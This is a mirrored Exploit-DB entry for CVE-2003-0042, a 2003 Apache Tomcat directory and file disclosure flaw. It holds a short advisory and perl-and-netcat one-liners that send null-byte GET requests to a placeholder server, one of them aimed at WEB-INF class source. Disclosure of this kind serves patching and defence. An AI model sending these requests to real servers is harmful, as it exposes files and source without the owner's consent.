- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22205
- Проверка EDB
-
- Пройдено
- Автор
- JOUKO PYNNöNEN
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2003-0042
- Дата публикации
- 2003-01-26
Код:
source: https://www.securityfocus.com/bid/6721/info
Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier.
It has been reported that remote attackers may view directory contents (even when an 'index.html' or other welcome file). It is also possible for remote attackers to disclose the contents of files.
This vulnerability is due to improper handling of null bytes (%00) and backslash ('\') characters in requests for web resources.
GET /<null byte>.jsp HTTP/1.0
$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080
$ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";'|nc my.server 8080
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080
- Источник
- www.exploit-db.com